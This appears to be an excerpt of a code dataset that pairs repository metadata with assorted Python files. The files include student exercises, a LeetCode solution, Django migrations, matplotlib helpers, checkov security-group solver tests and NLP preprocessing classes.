#item只适用于字典的复制方式,如下,但是f.name = xxx这种方式不行
f1["name"] = "chengqian"#可以这样定义属性,直接触发setitem方法
print(f1.__dict__)
|
[
"2395618655@qq.com"
] |
2395618655@qq.com
|
34510fbd0abc39f92acaa541a2f90739c91ea04e
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/8/usersdata/82/5616/submittedfiles/imc.py
|
e7a67c5946b587d937599ef4547dabde0603ba36
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 128
|
py
|
# -*- coding: utf-8 -*-
from __future__ import division
#ENTRADA
input ('Digite o peso em kg:')
input ('Digite a altura em m:')
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
78f34811ef30c2bf8f1ea658d1940d31e99bfc2c
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03409/s009547143.py
|
278737b03d5d70ba2b2f2aa87be5f575a51bf731
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 620
|
py
|
from collections import defaultdict
n = int(input())
cnt = 0
dic = defaultdict(list)
ab = []
cd = []
for i in range(n):
a, b = map(int, input().split())
ab.append((a, b))
for i in range(n):
c, d = map(int, input().split())
cd.append((c, d))
for i in ab:
for j in cd:
a, b = i
c, d = j
if a < c and b < d:
dic[i].append(j)
seen = set()
for key, value in sorted(dic.items(), key=lambda x: x[0][1], reverse=True):
for co in sorted(value, key=lambda x: x[0]):
if co not in seen:
cnt += 1
seen.add(co)
break
print(cnt)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
fed7951cee22cfc9c0882716080ae3b260d36460
|
3292017df3ff6c7190d5c5a60ecf5f8936cb7b90
|
/checkio/Ice Base/Colder-Warmer/test_colder_warmer.py
|
24974220ee88c2a77c726aa4a95705ec00bb272b
|
[
"MIT"
] |
permissive
|
KenMercusLai/checkio
|
1e9cdfe70ccaf5315db36391c4710533d99cf9aa
|
5082ab0c6a7ae2d97963568a6f41589332e88029
|
refs/heads/master
| 2022-05-12T18:22:22.604531
| 2022-05-11T09:00:28
| 2022-05-11T09:00:28
| 22,260,056
| 39
| 22
|
NOASSERTION
| 2022-05-11T08:42:05
| 2014-07-25T14:40:06
|
Python
|
UTF-8
|
Python
| false
| false
| 1,364
|
py
|
import unittest
from math import hypot
from colder_warmer import checkio
MAX_STEP = 12
def check_solution(func, goal, start):
prev_steps = [start]
for step in range(MAX_STEP):
row, col = func([s[:] for s in prev_steps])
if [row, col] == goal:
return True
if 10 <= row or 0 > row or 10 <= col or 0 > col:
print("You gave wrong coordinates.")
return False
prev_distance = hypot(prev_steps[-1][0] - goal[0], prev_steps[-1][1] - goal[1])
distance = hypot(row - goal[0], col - goal[1])
alteration = (
0 if prev_distance == distance else (1 if prev_distance > distance else -1)
)
prev_steps.append([row, col, alteration])
print("Too many steps")
return False
class Tests(unittest.TestCase):
TESTS = {
"1st": {"input": [[5, 5, 0]], "goal": [7, 7]},
"2nd": {"input": [[0, 0, 0]], "goal": [5, 6]},
"3rd": {"input": [[0, 0, 0]], "goal": [9, 9]},
"4th": {"input": [[7, 7, 0]], "goal": [2, 4]},
"5th": {"input": [[0, 9, 0]], "goal": [9, 0]},
}
def test_Basics(self):
for i in self.TESTS:
assert check_solution(
checkio, self.TESTS[i]['goal'], self.TESTS[i]['input'][0]
)
if __name__ == "__main__": # pragma: no cover
unittest.main()
|
[
"ken.mercus.lai@gmail.com"
] |
ken.mercus.lai@gmail.com
|
1568ef74cc5f8f1613a48d6d9899b608ab2d8575
|
499bc17d5cdfec023b9897fe8510c18c67432d70
|
/ibms_project/sfm/migrations/0007_costcentre_region.py
|
97b1bf8247f13b78917ecf76f0da243b0d895269
|
[
"Apache-2.0"
] |
permissive
|
ropable/ibms
|
952348fb44b7be6d2ee5722b3f3dc40eb42f6e35
|
fbfb4e85586bc7409d2abc3cfd51380b7f1f59d3
|
refs/heads/master
| 2023-08-31T22:21:19.050078
| 2023-08-24T04:48:36
| 2023-08-24T04:48:36
| 49,852,305
| 1
| 0
|
Apache-2.0
| 2020-08-13T01:09:55
| 2016-01-18T04:36:48
|
Python
|
UTF-8
|
Python
| false
| false
| 652
|
py
|
# Generated by Django 3.2.4 on 2021-08-23 01:17
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('sfm', '0006_sfmmetric_region'),
]
operations = [
migrations.AddField(
model_name='costcentre',
name='region',
field=models.CharField(blank=True, choices=[('Goldfields', 'Goldfields'), ('Kimberley', 'Kimberley'), ('Midwest', 'Midwest'), ('Pilbara', 'Pilbara'), ('South Coast', 'South Coast'), ('South West', 'South West'), ('Swan', 'Swan'), ('Warren', 'Warren'), ('Wheatbelt', 'Wheatbelt')], max_length=100, null=True),
),
]
|
[
"ashley@ropable.com"
] |
ashley@ropable.com
|
61c9b945b3814e8d0d8bae8207a4e3d8c13e36e3
|
152b74ed7d60d75a9d70f6637c107fff9b064ff9
|
/Chapter08/Testing Adversarial-Robustness of Neural Networks/abs_models/visualization.py
|
a2fc2a5c3716b85c177c3f61dc7da465f8ff83a3
|
[
"MIT"
] |
permissive
|
PacktPublishing/Machine-Learning-for-Cybersecurity-Cookbook
|
1d7a50fb79b5da8c411eda9dc9cface4d0f78125
|
19b9757020cbcb09d9bb4249605fbb9c7322d92b
|
refs/heads/master
| 2023-05-12T08:29:13.569598
| 2023-01-18T10:19:07
| 2023-01-18T10:19:07
| 222,411,828
| 250
| 164
|
MIT
| 2023-05-01T20:11:44
| 2019-11-18T09:33:53
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 6,395
|
py
|
import numpy as np
import torch
from matplotlib import pyplot as plt
from PIL import Image
from abs_models import utils as u
def visualize_image(ax, im, title=None, clear=False, **kwargs):
if clear:
ax.cla()
ax.imshow(im, **kwargs)
if title is not None:
ax.set_title(title)
ax.axis('off')
return(ax)
def plot(ax, y_datas, x_data=None, title=None, clear=True,
scale=None, legend=None):
if not any(isinstance(i, list) for i in y_datas):
y_datas = [y_datas]
if clear:
ax.clear()
if x_data is None:
x_data = range(len(y_datas[0]))
# acutal plotting
plots = []
for y_data in y_datas:
pl, = ax.plot(x_data, y_data)
plots.append(pl)
if legend:
ax.legend(plots, legend)
if scale is not None:
ax.set_yscale(scale)
if title is not None:
ax.set_title(title)
return ax
def scatter(ax, x_data, y_data, title=None, clear=True):
if clear:
ax.clear()
ax.scatter(x_data, y_data)
if title is not None:
ax.set_title(title)
def subplots(*args, height=6, width=15, **kwargs):
fig, ax = plt.subplots(*args, squeeze=False, **kwargs)
if height is not None:
fig.set_figheight(height)
if width is not None:
fig.set_figwidth(width)
return fig, ax
class Visualizer:
def __init__(self):
self.plots = {}
self.i = -1
self.reset()
def reset(self):
self.ny = 4
self.nx = 4
fig = plt.figure()
plt.ion()
fig.show()
fig.canvas.draw()
self.fig = fig
self.i = 0
# for key in self.plots.keys():
# self.plots[key].ax = self.get_next_plot()
def add_scalar(self, name, y, x):
y = u.t2n(y)
if name in self.plots.keys():
self.plots[name].x.append(x)
self.plots[name].y.append(y)
else:
self.plots[name] = PlotObj(x, y, self.get_next_plot())
self.plots[name].ax.clear()
plot(self.plots[name].ax, self.plots[name].y,
self.plots[name].x, title=name)
self.fig.canvas.draw()
def add_image(self, name, img, x):
if not isinstance(img, np.ndarray):
img = u.t2n(img)
img = img.squeeze()
if name not in self.plots.keys():
self.plots[name] = self.plots[name] \
= PlotObj(0, 0, self.get_next_plot())
visualize_image(self.plots[name].ax, img, title=name, cmap='gray')
def get_next_plot(self):
self.i += 1
ax = self.fig.add_subplot(self.nx, self.ny, self.i)
return ax
class PlotObj:
def __init__(self, x, y, ax):
self.x = [x]
self.y = [y]
self.ax = ax
# visualize hidden space
class RobNNVisualisor(object):
def __init__(self):
self.xl = []
self.yl = []
self.cl = []
def generate_data(self, model, loader, cuda=False):
for i, (test_data, test_label) in enumerate(loader):
if i == int(np.ceil(400 / loader.batch_size)):
break
x = test_data
yt = test_label
x = x.to(u.dev())
model.forward(x)
latent = model.latent.cpu().data.numpy().swapaxes(0, 1).squeeze()
self.xl += latent[0].tolist()
self.yl += latent[1].tolist()
self.cl += yt.data.numpy().tolist()
def visualize_hidden_space(self, fig, ax, model=None,
loader=None, cuda=False,
reload=False, colorbar=False):
if self.xl == [] or reload:
self.generate_data(model, loader, cuda=cuda)
cmap = plt.cm.get_cmap("viridis", 10)
pl = ax.scatter(self.xl, self.yl, c=self.cl, label=self.cl,
vmin=-0.5, vmax=9.5, cmap=cmap)
if colorbar:
fig.colorbar(pl, ax=ax, ticks=range(10))
return ax
def fig2img(fig):
    """
    @brief Convert a Matplotlib figure to a PIL Image in RGBA format
     and return it
    @param fig a matplotlib figure
    @return a Python Imaging Library ( PIL ) image
    """
    # put the figure pixmap into a numpy array
    buf = fig2data(fig)
    w, h, d = buf.shape
    # NOTE(review): a second fig2data() defined later in this module shadows
    # the ARGB version above; at runtime `buf` may therefore be RGB with 3
    # channels, which would break the "RGBA" decode below -- confirm which
    # fig2data is intended.
    # fix: ndarray.tostring() is deprecated (removed in recent NumPy);
    # tobytes() returns the identical byte string.
    return Image.frombytes("RGBA", (w, h), buf.tobytes())
def fig2data(fig):
    """
    @brief Convert a Matplotlib figure to a 4D numpy array with
     RGBA channels and return it
    @param fig a matplotlib figure
    @return a numpy 3D array of RGBA values
    """
    # draw the renderer
    fig.canvas.draw()

    # Get the RGBA buffer from the figure
    w, h = fig.canvas.get_width_height()
    buf = np.frombuffer(fig.canvas.tostring_argb(), dtype=np.uint8)
    # fix: the canvas buffer is row-major (height first); the original
    # (w, h, 4) reshape silently transposed the image for non-square figures.
    buf = buf.reshape(h, w, 4)

    # canvas.tostring_argb give pixmap in ARGB mode.
    # Roll the ALPHA channel to have it in RGBA mode
    buf = np.roll(buf, 3, axis=2)
    return buf
# adapted from https://github.com/lanpa/tensorboard-pytorch
def tens2scattters(tens, lims=None, labels=None):
    """Scatter-plot a 2-D tensor (row 0 = x, row 1 = y), coloured by
    *labels*, and return the rendered figure as a pixel array."""
    points = u.tens2numpy(tens)
    colors = u.tens2numpy(labels)
    # draw
    figure = plt.figure()
    axes = plt.gca()
    axes.scatter(points[0], points[1], c=colors)
    plt.axis('scaled')
    if lims is not None:
        axes.set_xlim(lims[0], lims[1])
        axes.set_ylim(lims[0], lims[1])
    return fig2data(figure)
def fig2data(fig):
    """Rasterize *fig*, close it, and return an (H, W, 3) uint8 RGB array.

    NOTE(review): this redefines the fig2data() declared earlier in this
    module (the ARGB variant); at runtime every caller resolves to this one.
    NOTE(review): tostring_rgb() is deprecated in newer Matplotlib
    (buffer_rgba() is the replacement) -- confirm the pinned version.
    """
    fig.canvas.draw()
    # Now we can save it to a numpy array.
    data = np.frombuffer(fig.canvas.tostring_rgb(), dtype=np.uint8)
    # get_width_height() returns (w, h); reversing it matches the canvas
    # buffer's row-major (h, w) layout.
    data = data.reshape(fig.canvas.get_width_height()[::-1] + (3,))
    plt.close()
    return data
def visualize_latent_distr(CNN, nd, limit=2, n_grid=100):
    """Evaluate *CNN* over an *nd*-dimensional grid spanning
    [-limit, limit] per axis and return a scatter image of its
    min-max-normalised outputs.

    Fix: the original immediately overwrote ``limit`` and ``n_grid`` with
    hard-coded values, making both parameters dead; they are now honoured
    (defaults unchanged, so existing callers behave identically).
    """
    fig, ax = subplots(1, 1, width=7, height=6)
    fig.subplots_adjust(right=0.8)
    grids = [(np.linspace(-limit, limit, n_grid)) for i in range(nd)]
    xys = np.array(np.meshgrid(*grids))
    xys = np.moveaxis(xys, 0, -1).reshape(n_grid ** nd, nd)
    # NOTE(review): hard-codes CUDA tensors -- fails on CPU-only hosts.
    outs = CNN.forward(torch.from_numpy(xys[:, :, None, None]).type(torch.cuda.FloatTensor))  # noqa: E501
    outs = u.t2n(outs.squeeze())
    # Min-max normalise outputs into [0, 1] for the colour mapping.
    sc = ax[0, 0].scatter(xys[:, 0], xys[:, 1], c=(outs - np.min(outs)) / (np.max(outs) - np.min(outs)))  # noqa: E501
    cbar_ax = fig.add_axes([0.85, 0.15, 0.05, 0.7])
    fig.colorbar(sc, cax=cbar_ax)
    return fig2data(fig)
if __name__ == '__main__':
    # Manual smoke test of the module's subplots() helper.
    fig, ax = subplots(2)
    print(ax)
|
[
"dineshchaudhary@packtpub.com"
] |
dineshchaudhary@packtpub.com
|
bfb42af3796dc24682eb5e3c0ed9198db2b7b387
|
3ff9821b1984417a83a75c7d186da9228e13ead9
|
/No_0222_Count Complete Tree Nodes/by_binary_search.py
|
006a5cadc6ca612d6efcf92d477269380d8c036e
|
[
"MIT"
] |
permissive
|
brianchiang-tw/leetcode
|
fd4df1917daef403c48cb5a3f5834579526ad0c2
|
6978acfb8cb767002cb953d02be68999845425f3
|
refs/heads/master
| 2023-06-11T00:44:01.423772
| 2023-06-01T03:52:00
| 2023-06-01T03:52:00
| 222,939,709
| 41
| 12
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,269
|
py
|
'''
Description:
Given a complete binary tree, count the number of nodes.
Note:
Definition of a complete binary tree from Wikipedia:
In a complete binary tree every level, except possibly the last, is completely filled, and all nodes in the last level are as far left as possible. It can have between 1 and 2h nodes inclusive at the last level h.
Example:
Input:
1
/ \
2 3
/ \ /
4 5 6
Output: 6
'''
# Definition for a binary tree node.
class TreeNode:
    """Binary-tree node: a value plus initially-unset left/right children."""

    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None
class Solution:
    def countNodes(self, root: TreeNode) -> int:
        """Count the nodes of a *complete* binary tree in O((log n)^2).

        Last-level nodes are numbered 2**(h-1) .. 2**h - 1 in level order;
        binary-searching for the last non-empty numbering yields the total
        node count directly (numbering == count for complete trees).
        """

        def helper(node: TreeNode):
            root = node
            if not node:
                # Quick response for empty tree
                return 0

            # Height = number of levels along the leftmost path.
            height = 0
            while node:
                node = node.left
                height += 1

            if height == 1:
                # Quick response for tree with one level only
                return 1

            # boundary of node numbering on last level
            left, right = 2 ** (height - 1), (2 ** height - 1)

            # For complete binary tree, the leftmost node on last level must exist
            last_exist = left

            # Launch binary search to find the numbering of last non-empty node on last level
            while left <= right:
                cur = root
                mid = left + (right - left) // 2

                # Walk from the root following mid's bits below the leading
                # bit: 1 -> right child, 0 -> left child.
                for h in range(height - 2, -1, -1):
                    mask = 1 << h
                    if mid & mask:
                        cur = cur.right
                    else:
                        cur = cur.left
                    # fix: removed a dead "mask >>= 1" here -- mask is
                    # recomputed from h on every iteration anyway.

                if cur is not None:
                    # update latest finding on last level
                    last_exist = mid
                    left = mid + 1
                else:
                    right = mid - 1

            return last_exist

        # -------------------------------
        return helper(root)
# n : the number of nodes in binary tree
## Time Complexity: O( (log n )^2 )
#
# The overhead in time is the cost of height of complete binary tree * cost of binary search on bottom level
# It takes O( h ) * O( log n) = O( log n ) * O( log n ) = O( (log n )^2 ) in total.
## Space Complexity: O( 1 )
#
# The overhead in space is the storage for loop index and temporary variable, which are of O( 1 )
def test_bench():
    """Rebuild the example tree from the problem statement and print the
    node count (expected output: 6)."""
    root = TreeNode(1)
    root.left, root.right = TreeNode(2), TreeNode(3)
    root.left.left, root.left.right = TreeNode(4), TreeNode(5)
    root.right.left = TreeNode(6)

    # expected output:
    '''
    6
    '''
    print(Solution().countNodes(root=root))

    return


if __name__ == '__main__':
    test_bench()
|
[
"brianchiang1988@icloud.com"
] |
brianchiang1988@icloud.com
|
d0e16e2419d18241a0865e98ba48b2a17e51f348
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/49/usersdata/87/17853/submittedfiles/pico.py
|
79eb44db0e38ef045bf5cae68bc141b72a01085b
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 502
|
py
|
# -*- coding: utf-8 -*-
from __future__ import division
def pico(lista):
    """Intended (from the script below, which prints "S"/"N") to report
    whether *lista* forms a "pico" (peak).

    NOTE(review): as written the peak check never happens -- the function
    returns True on the very first iteration for any non-empty list (the
    ``else`` branch is unreachable and ``cont`` is never consulted), raises
    IndexError for a one-element list (``lista[i+1]``), and falls through
    to None for an empty list.
    """
    cont=0
    for i in range (0,len(lista),1):
        if i==0:
            if lista[i]>lista[i+1]:
                cont=cont+1
            if lista[i+1]<lista[i]:
                cont=cont+1
            return True
        else:
            return False
# NOTE(review): Python 2 script -- input() eval's the typed text, which is
# what lets ``range(0, n, 1)`` below receive an int; under Python 3 input()
# returns str and this would raise TypeError.
a=[]
n=input("digite valor da quantidade de elementos:")
for i in range (0,n,1):
    a.append(input('digite elementos:'))
if pico(a):
    print("S")
else:
    print("N")
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
1721ea9ddcd5726fab2dd4be394836b06cc14ae7
|
ee5f91b0ae20ff1379da6dfa67eb27b402edcb1f
|
/user_app/urls.py
|
3e1ad01d32211e4ea2d1a61e31f2a8fa5222ca77
|
[] |
no_license
|
cs-fullstack-master/django-ModelForm1-ic
|
bc4e936fc9f5f701dd493c38f197aa1c382b9c9e
|
5654b26304da6a38b2807bf0cafc6bfe841f0a41
|
refs/heads/master
| 2020-04-25T14:09:00.682561
| 2019-10-03T19:36:50
| 2019-10-03T19:36:50
| 172,831,529
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 164
|
py
|
from django.urls import path
from user_app import views
# URL routes for user_app: the site root and the /users/ listing, each
# named ('index', 'users') so templates/views can reverse() them.
urlpatterns = [
    path('', views.index, name = 'index'),
    path('users/', views.users, name='users'),
]
|
[
"kevin@code-crew.org"
] |
kevin@code-crew.org
|
e68c1ecbbf40865932991688780f2519ddfe4a08
|
45e376ae66b78b17788b1d3575b334b2cb1d0b1c
|
/tests/terraform/graph/checks_infra/attribute_solvers/not_contains_solver/test_solver.py
|
3fa9383ab971c6b2dedc995c4e68a45f5018bb47
|
[
"Apache-2.0"
] |
permissive
|
bridgecrewio/checkov
|
aeb8febed2ed90e61d5755f8f9d80b125362644d
|
e64cbd27ffb6f09c2c9f081b45b7a821a3aa1a4d
|
refs/heads/main
| 2023-08-31T06:57:21.990147
| 2023-08-30T23:01:47
| 2023-08-30T23:01:47
| 224,386,599
| 5,929
| 1,056
|
Apache-2.0
| 2023-09-14T20:10:23
| 2019-11-27T08:55:14
|
Python
|
UTF-8
|
Python
| false
| false
| 1,902
|
py
|
import os
from parameterized import parameterized_class
from tests.terraform.graph.checks_infra.test_base import TestBaseSolver
TEST_DIRNAME = os.path.dirname(os.path.realpath(__file__))
@parameterized_class([
    {"graph_framework": "NETWORKX"},
    {"graph_framework": "IGRAPH"}
])
class TestNotContainsSolver(TestBaseSolver):
    """Exercises the not_contains attribute solver against fixture graphs,
    once per supported graph framework (networkx / igraph)."""

    def setUp(self):
        self.checks_dir = TEST_DIRNAME
        super(TestNotContainsSolver, self).setUp()

    def _check(self, root_folder, check_id, should_pass, should_fail):
        # Shared driver: package the expectations the way run_test expects.
        expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}}
        self.run_test(root_folder=root_folder, expected_results=expected_results, check_id=check_id)

    def test_public_virtual_machines(self):
        self._check(
            '../../../resources/public_virtual_machines',
            "PublicVMs",
            should_pass=['aws_default_security_group.default_security_group_closed'],
            should_fail=['aws_default_security_group.default_security_group_open'],
        )

    def test_list_cidr_blocks(self):
        self._check(
            '../../../resources/security_group_list_cidr_blocks',
            "PublicSG",
            should_pass=['aws_security_group.passed_cidr_block', 'aws_security_group.failed_cidr_blocks'],
            should_fail=[],
        )

    def test_list_cidr_blocks_specific(self):
        self._check(
            '../../../resources/security_group_list_cidr_blocks',
            "SpecificBlockSG",
            should_pass=['aws_security_group.failed_cidr_blocks'],
            should_fail=['aws_security_group.passed_cidr_block'],
        )
|
[
"noreply@github.com"
] |
bridgecrewio.noreply@github.com
|
6e77e8a9684379dd99bad07ebcedd73de9c6a811
|
453e245dcb67a75f671d5e6067af13c21acd4f97
|
/1.1 Data/7-make_regression.py
|
2e01163f5ed0e87a56fe08c45d21b11ebcf5ca64
|
[] |
no_license
|
ahmedatef1610/scikit-learn-library-for-machine-learning
|
c828f7510cd9a7df41e7aece31c08ea00d69bb4f
|
f12be8c1702c413742328a75f60b9b1f78a3c2d3
|
refs/heads/main
| 2023-04-05T01:23:46.970931
| 2021-04-12T09:16:26
| 2021-04-12T09:16:26
| 356,732,567
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 623
|
py
|
# Import Libraries
from sklearn.datasets import make_regression
# ----------------------------------------------------
# load regression data
'''
X ,y = make_regression(n_samples=100, n_features=100, n_informative=10,
n_targets=1, bias=0.0, effective_rank=None,
tail_strength=0.5, noise=0.0, shuffle=True, coef=False,
random_state=None)
'''
X, y = make_regression(n_samples=10000, n_features=500, shuffle=True)
# X Data
print('X Data is \n', X[:10])
print('X shape is ', X.shape)
# y Data
print('y Data is \n', y[:10])
print('y shape is ', y.shape)
|
[
"ahmedatef1610@gmail.com"
] |
ahmedatef1610@gmail.com
|
fcd432036bd5e790ae9758afc44a70e2fbbe4378
|
df6d9d599568e7437f614c1404b26f74ebab47b0
|
/Preprocessing/processingresources.py
|
d0c1c999456a19e54b8c9b11cdf69113d8e5fe7a
|
[
"Apache-2.0"
] |
permissive
|
akshay-verma/semeval2019-hyperpartisan-bertha-von-suttner
|
cacd535d7234a175e4d05a0c0ccbc6bde70495d1
|
1de672f5c7a5be3f9fff89c091b6211a85b69a8b
|
refs/heads/master
| 2020-05-17T16:56:35.563614
| 2019-04-29T20:09:08
| 2019-04-29T20:09:08
| 183,834,154
| 0
| 0
|
Apache-2.0
| 2019-04-28T00:24:43
| 2019-04-28T00:24:43
| null |
UTF-8
|
Python
| false
| false
| 7,058
|
py
|
"""
Classes representing "processing resources"
"""
import preprocessing
import xml.etree.ElementTree
import tldextract
from collections import Counter
import features
import json
from numbers import Number
import htmlparser
import sys
class PrArticle2Line:
def __init__(self, stream, featureslist, addtargets=True):
self.stream = stream
self.features = features.features2use(featureslist)
self.mp_able = False
self.addtargets = addtargets
self.need_et = False
def __call__(self, article, **kwargs):
values = features.doc2features(article, self.features)
strings = []
for i in range(len(values)):
val = values[i]
if isinstance(val, str):
strings.append(val)
elif isinstance(val, Number):
strings.append(str(val))
elif isinstance(val, list):
strings.append(json.dumps(val))
elif isinstance(val, dict):
strings.append(json.dumps(val))
else:
# raise Exception("Not a known type to convert to string: {} for {}, feature {}, article id {}".
# format(type(val), val, self.features[i], article['id']))
print("Not a known type to convert to string: {} for {}, feature {}, article id {}".
format(type(val), val, self.features[i], article['id']))
if self.addtargets:
print(article['id'], article.get('target'),
article.get('bias'), article.get('domain'),
"\t".join(strings), file=self.stream, sep="\t")
else:
print("\t".join(strings), file=self.stream)
class PrAddTarget:
def __init__(self, a2target, a2bias, a2url):
self.a2target = a2target
self.a2bias = a2bias
self.a2url = a2url
self.mp_able = True
self.need_et = False
def __call__(self, article, **kwargs):
id = article['id']
target = self.a2target[id]
bias = self.a2bias[id]
url = self.a2url[id]
article['target'] = target
article['bias'] = bias
article['url'] = url
class PrAddTitle:
def __init__(self):
self.mp_able = True
self.need_et = True
def __call__(self, article, **kwargs):
element = article['et']
attrs = element.attrib
title = preprocessing.cleantext(attrs["title"])
article['title'] = title
class PrAddText:
def __init__(self):
self.mp_able = True
self.need_et = False
self.parser = None # initialize later, do not want to pickle for the pipeline
def __call__(self, article, **kwargs):
if self.parser is None:
self.parser = htmlparser.MyHTMLParser()
self.parser.reset()
self.parser.feed(article['xml'])
self.parser.close()
pars = self.parser.paragraphs()
article['pars'] = pars
text = " ".join(pars)
article['text'] = text
class PrRemovePars:
def __init__(self):
self.mp_able = True
self.need_et = False
def __call__(self, article, **kwargs):
del article['pars']
class PrFilteredText:
"""
Calculate the single filtered text field text_all_filtered, must already have nlp
"""
def __init__(self):
self.mp_able = True
self.need_et = False
def __call__(self, article, **kwargs):
import nlp
text_tokens = article['text_tokens']
title_tokens = article['title_tokens']
tokens = nlp.filter_tokens([t[0] for t in title_tokens])
tokens.append("<sep_t2d>")
if article.get('link_domains_all'):
tokens.extend(["DOMAIN_" + d for d in article['link_domains']])
tokens.append("<sep_d2a>")
tokens.extend(nlp.filter_tokens([t[0] for sent in text_tokens for t in sent]))
token_string = " ".join(tokens)
article['text_all_filtered'] = token_string
class PrNlpSpacy01:
"""
Tokenise and POS-tag the title and article.
The title gets converted into a list of list word, POS, lemma.
The article gets converted into a list of
sentences containing a list of lists word, POS, lemma for the sentence.
:return:
"""
def __init__(self):
import spacy
self.mp_able = True
self.initialized = False
self.need_et = False
self.nlp = None
def initialize(self):
if self.initialized:
return
import spacy
self.nlp = spacy.load("en_core_web_sm", disable=["parser"])
self.nlp.add_pipe(self.nlp.create_pipe('sentencizer'))
self.initialized = True
def __call__(self, article, **kwargs):
# process each paragraph separately to avoid getting sentences
# crossing paragraphs
if not self.initialized:
self.initialize()
pars = article['pars']
# store the raw number of paragraphs
article['n_p'] = len(pars)
# print("DEBUG: number of pars", len(pars))
n_p_filled = 0
# print("\n\nDEBUG: {} the texts we get from the paragraphs: ".format(article['id']), pars)
docs = list(self.nlp.pipe(pars))
allthree = [[[t.text, t.pos_, t.lemma_] for t in s] for doc in docs for s in doc.sents]
article['n_p_filled'] = n_p_filled
article['text_tokens'] = allthree
ents = [ent.text for doc in docs for ent in doc.ents if ent.text[0].isupper()]
article['text_ents'] = ents
title = article['title']
doc = self.nlp(title)
allthree = [(t.text, t.pos_, t.lemma_) for s in list(doc.sents) for t in s]
article['title_tokens'] = allthree
ents = [ent.text for ent in doc.ents if ent.text[0].isupper()]
article['title_ents'] = ents
class PrSeqSentences:
"""
Creates fields: title_sent, domain_sent, article_sent, title and article generated from the
token lists for the title and article text (using the original token string)
The sentences for the article are enclosed in the special <bos> and <eos> markers.
"""
def __init__(self):
self.mp_able = True
self.need_et = False
def __call__(self, article, **kwargs):
article_tokens = article['text_tokens']
title_tokens = article['title_tokens']
title_sent = " ".join([t[0] for t in title_tokens])
domain_sent = ""
if article.get('link_domains_all'):
domain_sent = " ".join(["DOMAIN_" + d for d in article['link_domains']])
all = []
first = True
for sent in article_tokens:
if first:
first = False
else:
all.append("<splt>")
# all.append("<bos>")
for t in sent:
all.append(t[0])
# all.append("<eos>")
article_sent = " ".join(all)
article['article_sent'] = article_sent
article['domain_sent'] = domain_sent
article['title_sent'] = title_sent
|
[
"johann.petrak@gmail.com"
] |
johann.petrak@gmail.com
|
85e5435fddc690666b601db7f53c32927be2aa4f
|
4c9e3a963aef1d8f0cea9edc35e3c5ffc64a87d1
|
/python-webpy/wiki/model.py
|
15f7152764ee641c2d6b368787597759d85ce4d6
|
[] |
no_license
|
hackrole/daily-program
|
d6820d532a9ebb8132676e58da8e2382bd459b8f
|
cff87a09f03ce5bd9e186b0302bead6cd8484ab5
|
refs/heads/master
| 2021-01-21T13:11:55.287908
| 2015-04-21T14:34:36
| 2015-04-21T14:34:36
| 17,940,553
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 931
|
py
|
import web
db = web.database(dbn='sqlite', db='sql/main.db')
def get_pages():
    """Return all wiki pages, newest (highest id) first."""
    return db.select('pages', order='id DESC')
def get_page_by_url(url):
    """Return the first page row matching *url*, or None when absent.

    Arguments:
    - `url`: the page's url slug
    """
    try:
        return db.select('pages', where='url=$url', vars=locals())[0]
    except IndexError:
        return None
def get_page_by_id(id):
    """Return the page row with primary key *id*, or None when absent.

    Arguments:
    - `id`: primary key of the page
    """
    try:
        return db.select('pages', where='id=$id', vars=locals())[0]
    except IndexError:
        return None
def new_page(url, title, text):
    """Insert a new page row; *text* is stored in the ``content`` column."""
    db.insert('pages', url=url, title=title, content=text)
def del_page(id):
    """Delete the page with primary key *id*.

    Arguments:
    - `id`: primary key of the page to remove
    """
    db.delete('pages', where='id=$id', vars=locals())
def update_page(id, url, title, text):
    """Overwrite url, title and content of the page with primary key *id*.

    Arguments:
    - `id`: primary key of the page to update
    - `url`: new url slug
    """
    db.update('pages', where='id=$id', vars=locals(), url=url, title=title, content=text)
|
[
"daipeng123456@gmail.com"
] |
daipeng123456@gmail.com
|
fbbb1076d82b8b95b154e02ca11dad432c9ea418
|
4f728a8177d041ca8cbd616ec58858eb3fc4c204
|
/aleph/graph/queries.py
|
2d88424dc2923d7a720bd74908da3e839dc9b6b2
|
[
"MIT"
] |
permissive
|
nivertech/aleph
|
9bafa122a99be82ae09219a4abdf5ca3aa05bc55
|
20c773352e2c533867c75b0e658c6ff4a58c47a2
|
refs/heads/master
| 2020-12-11T08:14:43.634439
| 2016-08-08T10:47:44
| 2016-08-08T10:47:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,561
|
py
|
import logging
from aleph import authz
from aleph.graph.schema import NodeType, EdgeType
